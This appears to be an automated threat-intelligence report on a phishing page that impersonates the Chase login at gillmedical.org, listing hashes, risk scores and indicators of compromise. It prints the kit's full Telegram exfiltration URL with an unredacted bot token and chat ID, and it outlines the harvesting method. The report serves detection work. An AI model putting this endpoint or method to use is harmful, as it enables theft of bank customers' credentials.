Phishing Analysis: Chase

Captura Visual

Información de Detección

http://gillmedical.org/Chase/CHASE

Detected Brand

Chase

Country

USA

Confidence

96%

HTTP Status

200

Report ID

034e64c1-94b…

Analyzed

2026-01-30 23:46

Final URL (after redirects)

http://gillmedical.org/Chase/CHASE/login.php

Hashes de Contenido (Similitud HTML)

Used to detect similar phishing pages based on HTML content

Algorithm	Hash Value
CONTENT TLSH	T1176110F14584A42902A282D18E32E369D382D474DF730B0B9AE5E75EBBDBFD8CC05079
CONTENT ssdeep	48:nXjLFTNmTNMitOKsanfI6SfnCw02hse5SnCw02hsesdQ5YpP5hvopBliFOo6wXmb:nTLG4KVZS6l3ONl3/2Ex0ZN

Hashes Visuales (Similitud de Captura)

Used to detect visually similar phishing pages based on screenshots

Algorithm	Hash Value
VISUAL pHash	c958e663b30e35e2
VISUAL aHash	001818180000ffff
VISUAL dHash	91b2b0b0dbd2e200
VISUAL wHash	007c5c584848ffff
VISUAL colorHash	0b580001000
VISUAL cropResistant	d4e0d4d0d0d6dcdc,e0e1000c20150800,1db2b1b0b1dbd2f2

Análisis de Código

Risk Score 81/100

Threat Level ALTO

⚠️ Phishing Confirmed

🎣 Credential Harvester

Telegram Exfiltration

🔬 Threat Analysis Report

• Amenaza: Phishing
• Objetivo: Clientes de Chase
• Método: Suplantación y recopilación de credenciales
• Exfil: Datos enviados a post.php, posiblemente a través de un bot de Telegram
• Indicadores: Coincidencia de dominio, formulario de inicio de sesión, imitación visual
• Riesgo: Alto

🔐 Credential Harvesting Forms

🔒 Obfuscation Detected

fromCharCode
unicode_escape

🎯 Kit Endpoints

https://api.telegram.org/bot7571937466:AAGs4WrakEQckPQy5-v_8kD26YOiIKFc7TU/sendMessage?chat_id=1418778003&text=New visit%0AIP:207.244.255.96

📤 Form Action Targets

post.php

🔑 Telegram Bot Tokens (1)

7571937466:AAGs...iIKFc7TU

💬 Telegram Chat IDs (1)

1418778003

📊 Desglose de Puntuación de Riesgo

Total Risk Score

90/100

Contributing Factors

Domain Mismatch

The domain gillmedical.org is completely unrelated to the brand Chase.

Presence of Login Form

The page includes a login form, indicating credential harvesting.

Impersonation

Visual design is attempting to replicate Chase's.

Obfuscation Detected

Javascript obfuscation found.

Telegram Token Found

Telegram bot token discovered.

🔬 Análisis Integral de Amenazas

Tipo de Amenaza

Credential Harvesting Kit

Objetivo

Chase users (USA)

Método de Ataque

Brand impersonation + credential harvesting forms + obfuscated JavaScript

Canal de Exfiltración

Telegram Bot (7571937466:AAGs4Wrak...) + HTTP POST to backend

Evaluación de Riesgo

CRITICAL - Automated credential harvesting with Telegram Bot (7571937466:AAGs4Wrak...) + HTTP POST to backend

⚠️ Indicators of Compromise

1 Telegram bot token(s)
Kit types: Credential Harvester
28 obfuscation techniques

🏢 Análisis de Suplantación de Marca

Impersonated Brand

Chase

Official Website

https://www.chase.com/

Fake Service

Chase Online Login

⚔️ Metodología de Ataque

Primary Method: Credential Harvesting

The attacker creates a fake login page that mimics the appearance of Chase's login. The user enters their credentials, which are then harvested and sent to the attacker.